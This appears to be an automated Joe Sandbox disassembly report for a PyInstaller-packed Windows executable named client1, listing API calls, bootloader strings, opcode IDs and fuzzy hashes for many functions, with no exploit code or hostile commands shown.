                                                    • String ID: Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                    • API String ID: 0-666925554
                                                    • Opcode ID: 2fea18010eede0dcf90c79ed6fa7ce80656e63f02532b84c6099f7311018752c
                                                    • Instruction ID: 0190cd064c25e385b7292367919a27a15d736b7076455ffd5e4312f0d7858d72
                                                    • Opcode Fuzzy Hash: 2fea18010eede0dcf90c79ed6fa7ce80656e63f02532b84c6099f7311018752c
                                                    • Instruction Fuzzy Hash: EC518C61B0C7C251FE30BB31A8506F9A39ABF45BA4F844531DE2D87796EE3CE5458321

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                                                    • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                    • API String ID: 4998090-2855260032
                                                    • Opcode ID: 2e28230f75d657313d5b30c4cdf08458408b558478e57b477a7299d9920cfa6e
                                                    • Instruction ID: 5091bb93fd22be243f411a30a0651f203524a3d1e1ac6d27fc3a0dfc45faf5d1
                                                    • Opcode Fuzzy Hash: 2e28230f75d657313d5b30c4cdf08458408b558478e57b477a7299d9920cfa6e
                                                    • Instruction Fuzzy Hash: 6941333161C7C282E660BF75E8446E9B366FB847A4F840231EA6E876D5DF7CD444CB11

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                    • String ID: CreateProcessW$Error creating child process!
                                                    • API String ID: 2895956056-3524285272
                                                    • Opcode ID: 818e29d337d92c80142cd965dc47d4137e35c853672c1fb6e5a7bce6e7f526a1
                                                    • Instruction ID: d380c7af5ec119b0fcd4c139edf9bb9be3613d7e6ca27189c727d82b26037fa6
                                                    • Opcode Fuzzy Hash: 818e29d337d92c80142cd965dc47d4137e35c853672c1fb6e5a7bce6e7f526a1
                                                    • Instruction Fuzzy Hash: 2141F032A087C281DA20BB70E8552EAE3A9FB95364F900735E6BD47AD5DF7CD0548B50

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00007FF79F623BA0: GetModuleFileNameW.KERNEL32(?,00007FF79F623699), ref: 00007FF79F623BD1
                                                    • SetDllDirectoryW.KERNEL32 ref: 00007FF79F6238A5
                                                      • Part of subcall function 00007FF79F626990: GetEnvironmentVariableW.KERNEL32(00007FF79F6236E7), ref: 00007FF79F6269CA
                                                      • Part of subcall function 00007FF79F626990: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF79F6269E7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                    • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                    • API String ID: 2344891160-3602715111
                                                    • Opcode ID: 77e9097737c6dbac510413c8d6195b52a6989022757785ea82a29cea3795633a
                                                    • Instruction ID: 9378a5468035c64dedb7c7cf3ca2fb4a3c8269c726e826f7cfe078daac12dbd0
                                                    • Opcode Fuzzy Hash: 77e9097737c6dbac510413c8d6195b52a6989022757785ea82a29cea3795633a
                                                    • Instruction Fuzzy Hash: 57B1B121A1D7C351FE30BB319D522FDA25ABF44794FC04139EA6D87696EF2CE5048722

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Message
                                                    • String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                    • API String ID: 2030045667-1655038675
                                                    • Opcode ID: de1008961ff69e091347802e1359ecf358b4a9365226622b4b91588027350825
                                                    • Instruction ID: 2b31e093f5533dd89edb20ea74b162bd156f727efe36cfc882a4b9eebf5bb82e
                                                    • Opcode Fuzzy Hash: de1008961ff69e091347802e1359ecf358b4a9365226622b4b91588027350825
                                                    • Instruction Fuzzy Hash: DA51A022A0D7C285EA30BB61A8403FAA29AFB85794F844135EE6D87785EF3CE545C711

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: 184652ea66a00c646f0d6e367f8fa0d47b8fb75159f9cd0cc9461bb9675fa9ff
                                                    • Instruction ID: c801ba19517fe8c095bfee1e2afcf681606a9116e899a8ae86aa424cf4ace6f0
                                                    • Opcode Fuzzy Hash: 184652ea66a00c646f0d6e367f8fa0d47b8fb75159f9cd0cc9461bb9675fa9ff
                                                    • Instruction Fuzzy Hash: 45C1C52290C7C691EA70BB35A4402FDE7AAEFC1B84F950135E96D03796CEBDE8458720

                                                    Control-flow Graph

                                                    APIs
                                                    • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF79F63C41B), ref: 00007FF79F63C54C
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF79F63C41B), ref: 00007FF79F63C5D7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ConsoleErrorLastMode
                                                    • String ID:
                                                    • API String ID: 953036326-0
                                                    • Opcode ID: f410d9e07cb2d854853af875ff306a0e9c9ee922f70c4cde11a48ef332fbc2ec
                                                    • Instruction ID: 5604af1f55dfa74d243b04c6b709e5414ebe5a52dd48abac83f59e56c415e26f
                                                    • Opcode Fuzzy Hash: f410d9e07cb2d854853af875ff306a0e9c9ee922f70c4cde11a48ef332fbc2ec
                                                    • Instruction Fuzzy Hash: DD91F422E087A285F771AF3594402FDABFABB45B88F945139EE1E53A85CF78D441C720

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _get_daylight$_isindst
                                                    • String ID:
                                                    • API String ID: 4170891091-0
                                                    • Opcode ID: d5d13d1c94d14ccfec0c44e7243bbda22246c77cf8c41a11f0b86d98f8b3a05c
                                                    • Instruction ID: 3e9ed73f2e8261dce19645282c8f43f150ae992c41bc12e35cf438408835576f
                                                    • Opcode Fuzzy Hash: d5d13d1c94d14ccfec0c44e7243bbda22246c77cf8c41a11f0b86d98f8b3a05c
                                                    • Instruction Fuzzy Hash: 84512972F047918AFB34EF7498412FCA7AABB10358F944235ED2E52AD5DB3CA406C720

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                    • String ID:
                                                    • API String ID: 2780335769-0
                                                    • Opcode ID: 1c70a69b05d9cb3f6248f84cd75ebf1bef0caf7e7cf88daad42b4853df974b62
                                                    • Instruction ID: da029fc5d351682b408e8feb9d914ebf8abeb788ae687c28d879cfc1d896197f
                                                    • Opcode Fuzzy Hash: 1c70a69b05d9cb3f6248f84cd75ebf1bef0caf7e7cf88daad42b4853df974b62
                                                    • Instruction Fuzzy Hash: 83516D23E087818AFB20EF71D4503FDB7AAAB48B98FA44135DE2D57699DF78D4418720

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                    • String ID:
                                                    • API String ID: 1452418845-0
                                                    • Opcode ID: 90a7fcc3a81af5bf04ad81541e301d7d9fb9f11ea0fdd18d74326f9016f6428e
                                                    • Instruction ID: 7bfa76644cef631d3ae45f44de4443e65a40bd1892020e5672e118848bef1773
                                                    • Opcode Fuzzy Hash: 90a7fcc3a81af5bf04ad81541e301d7d9fb9f11ea0fdd18d74326f9016f6428e
                                                    • Instruction Fuzzy Hash: 73311321E097C345FA74BB7499513FDA29BEF91384FC44034E92E8B2D7DE6CA8058272
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 1279662727-0
                                                    • Opcode ID: aa6a3d9890cc6a7f195a6e990ba186583f2f0d5ddde8471eaaef5ef51b0941e7
                                                    • Instruction ID: 3c025c4dba6c9d4953071937d259e383a1883ee57a742f34534be38f6efcc3b2
                                                    • Opcode Fuzzy Hash: aa6a3d9890cc6a7f195a6e990ba186583f2f0d5ddde8471eaaef5ef51b0941e7
                                                    • Instruction Fuzzy Hash: 24419523D187C183FB64AF3195503B9E265FB957A4F609334E66C03AD6DFACA5E08710
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: bd665411d6c8cb657e02e9163d495b47fe1eb31481a6a537198dee777c004d3e
                                                    • Instruction ID: b1739a37f4992f6b746848c27ac7417057e0e1e55ffde008eb368e8f11f59d45
                                                    • Opcode Fuzzy Hash: bd665411d6c8cb657e02e9163d495b47fe1eb31481a6a537198dee777c004d3e
                                                    • Instruction Fuzzy Hash: D051EA61B193C245EA78AE3998006FAE19AAF44BB4F944734DD7D877CACF7CD4018722
                                                    APIs
                                                    • SetFilePointerEx.KERNELBASE(?,?,?,?,00000000,00007FF79F63B79D), ref: 00007FF79F63B650
                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,00007FF79F63B79D), ref: 00007FF79F63B65A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastPointer
                                                    • String ID:
                                                    • API String ID: 2976181284-0
                                                    • Opcode ID: ff2257711b1d275b862e663729d543ef4812b290fbf882e2e1232765a84f7875
                                                    • Instruction ID: 5f155c4b525449dfabc16d6bc686e936b05c9d6be56a2bcf0d31afdc90bb181e
                                                    • Opcode Fuzzy Hash: ff2257711b1d275b862e663729d543ef4812b290fbf882e2e1232765a84f7875
                                                    • Instruction Fuzzy Hash: 3011B262B18BD181DA20AB35B4441A9E766AB85BF4F944331EA7D477E9CF7CD0118700
                                                    APIs
                                                    • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79F634891), ref: 00007FF79F6349AF
                                                    • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79F634891), ref: 00007FF79F6349C5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Time$System$FileLocalSpecific
                                                    • String ID:
                                                    • API String ID: 1707611234-0
                                                    • Opcode ID: 42d85f7bbfb38a33647f37402af2049ec243a38652db21839daf1665d9964160
                                                    • Instruction ID: c28e77baafd840d6b6a1853f21ae214b9dcd080fb990332cbe7c8f659b08ad54
                                                    • Opcode Fuzzy Hash: 42d85f7bbfb38a33647f37402af2049ec243a38652db21839daf1665d9964160
                                                    • Instruction Fuzzy Hash: A511947260C78281EA74AF61A4511BAF766EB85771FA00235E6AD819D8EF6CD044DB20
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(?,?,?,00007FF79F641E42,?,?,?,00007FF79F641E7F,?,?,00000000,00007FF79F642345,?,?,?,00007FF79F642277), ref: 00007FF79F639E2E
                                                    • GetLastError.KERNEL32(?,?,?,00007FF79F641E42,?,?,?,00007FF79F641E7F,?,?,00000000,00007FF79F642345,?,?,?,00007FF79F642277), ref: 00007FF79F639E38
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 485612231-0
                                                    • Opcode ID: 875bb2537aa3df01b4a1e34b7b101e94a2dc47b4cb64fa0c1180c15e07a79d81
                                                    • Instruction ID: 19b6404031add2747783e028df64db8afdda7d2ccebf9d65ef22a9341bfc207e
                                                    • Opcode Fuzzy Hash: 875bb2537aa3df01b4a1e34b7b101e94a2dc47b4cb64fa0c1180c15e07a79d81
                                                    • Instruction Fuzzy Hash: F5E08651F0878292FF347FB268850F5926B5F44B40BC44034C92D43252DE6CA8458730
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?,?,?,00007FF79F639EA5,?,?,00000000,00007FF79F639F5A), ref: 00007FF79F63A096
                                                    • GetLastError.KERNEL32(?,?,?,00007FF79F639EA5,?,?,00000000,00007FF79F639F5A), ref: 00007FF79F63A0A0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: CloseErrorHandleLast
                                                    • String ID:
                                                    • API String ID: 918212764-0
                                                    • Opcode ID: 649148bb364a2e2bb6c01b4b98e8ba63ccdb9764b03dbbc10b4a89a301f042aa
                                                    • Instruction ID: 2210f0c6ec18eeecfef81bc4cfd7c9cdc769538a92b900b740c2422d0832fc66
                                                    • Opcode Fuzzy Hash: 649148bb364a2e2bb6c01b4b98e8ba63ccdb9764b03dbbc10b4a89a301f042aa
                                                    • Instruction Fuzzy Hash: 4C21C211B0C7C341FA747770A4942F9969BAF447A8F844235D93E477C2CFAEA4459320
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: 7edcb5c19051daea02f21c4053ec30bf8603933813fd22e9cae156a3527bc5bd
                                                    • Instruction ID: b5a193a13d7b48370e63cf277ad17c374611f16b92cad1aa5c5fcc9b271d7ff0
                                                    • Opcode Fuzzy Hash: 7edcb5c19051daea02f21c4053ec30bf8603933813fd22e9cae156a3527bc5bd
                                                    • Instruction Fuzzy Hash: 8841BB3291878147EA34EB35E5401B9F76AEBD5750F900131E6AD476D5CF7CE402CB61
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _fread_nolock
                                                    • String ID:
                                                    • API String ID: 840049012-0
                                                    • Opcode ID: 9ca53ffba42af0d53283354c29b034d8f43de260ca55deaba02b2ea4ed6d239a
                                                    • Instruction ID: aaba48ed78273238833eb8c1e2c2563056a8dc6ee45a4c99caa644b75089b6cd
                                                    • Opcode Fuzzy Hash: 9ca53ffba42af0d53283354c29b034d8f43de260ca55deaba02b2ea4ed6d239a
                                                    • Instruction Fuzzy Hash: 0A218521B193D145EA31BA3269447FAE65ABF45BD4FC84430EE2D87786CF7DE1418211
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: 36b0fbc90b3b462680d3b6a13c035726274d9c74de2b43bcb58660ea55cb43b3
                                                    • Instruction ID: 63730c47883fcca5f8c442cb7ac1d0d8529cbffe6236c03dfad8cc0605df32aa
                                                    • Opcode Fuzzy Hash: 36b0fbc90b3b462680d3b6a13c035726274d9c74de2b43bcb58660ea55cb43b3
                                                    • Instruction Fuzzy Hash: F0319222A187C145EB61BB3594013F8A66AEF40BA1F910135DA3D433D3CFFDA4419731
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
